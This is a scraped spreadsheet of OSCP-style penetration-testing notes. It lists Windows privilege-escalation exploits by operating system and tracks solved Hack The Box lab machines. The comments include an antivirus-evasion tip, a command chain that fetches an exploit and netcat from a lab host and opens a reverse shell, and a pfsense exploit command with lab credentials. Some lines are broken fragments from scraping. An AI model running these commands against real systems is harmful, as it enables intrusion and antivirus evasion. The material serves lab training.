Operation System Non-Metasploit

Download as xlsx, pdf, or txt
Download as xlsx, pdf, or txt
You are on page 1of 7

Operation System Non-Metasploit

Windows Server 2012 x64 MS16-032.ps1


Microsoft Windows 7 Enterprise 6.1.7600 - x86
Microsoft Windows Server 2008 R2 Datacenter x64 MS15-051.exe
Microsoft Windows Server 2008 R2 Standard x64 ms15-051x64.exe
Microsoft(R) Windows(R) Server 2003, Standard Edition x86
Microsoft Windows Server 2008 R2 Datacenter x64 - 1 proccessor ms15-051x64.exe
Metasploit
ms16-032_secondary_logon_handle_privesc
ms10-015_kitrap0d

exploit/windows/local/ms15_051_client_copy_image
Comment

If CPU is 2 Core, can use MS16-032


Use impacket-smbserver to bypass anoti-virus or win defender and trasfer your file to run on victim machine.
cscript wget.vbs http://10.10.14.11/ms15-051x64.exe ms15-051x64.exe | cscript wget.vbs http://10.10.14.11/nc64.exe nc64.
64.exe nc64.exe | C:\ColdFusion8\runtime\bin>ms15-051x64.exe "nc64.exe 10.10.14.11 1338 -e cmd.exe"
Hack The Box OSCP-like VMs
Curated by: TJnull at Netsec Focus
Windows
Linux Boxes:
Boxes:
Lame done! legacy
brainfuck done! Blue
shocker done! Devel
bashed done! Optimum
nibbles done! Bastard
beep done! granny
cronos done! Arctic
nineveh done! grandpa
sense user: rohit pass: pfsense silo
solidstate done! bounty
node done! jerry
valentine done! conceal
poison done! chatterbox
sunday done! Forest
tartarsauce done! BankRobber
Irked done! secnotes
Friendzone done! Bastion
Swagshop done!
Networked done!
jarvis done!
Mirai done!
Popcorn done!
Haircut done!
Blocky done!
Frolic done!
October done!
Postman done!
Mango done!
Click the tab below for VulnHub VMs or for OSWE VM's

More challenging than


OSCP, but good practice:
done! Jeeves [Windows]
done! Bart [Windows]
done! Tally [Windows]
done! Active [Windows]
done! Kotarak [Linux]
same like grandpa | Webdav enabled falafel [Linux]
done! Devops [Linux]
done! Hawk [Linux] python pfsense.py --rho
done! Netmon [Windows]
done! Lightweight [Linux]
done! La Casa De Papel [Linux]
? Ipsec Vpn problem Jail [Linux]
done! Safe [Linux]
active directory Bitlab [Linux]
done! Sizzle [Windows]
done! Sniper [Windows]
done! Control [Windows]
python pfsense.py --rhost 10.10.10.60 --lhost 10.10.14.11 --lport 1337 --username rohit --password pfsense

You might also like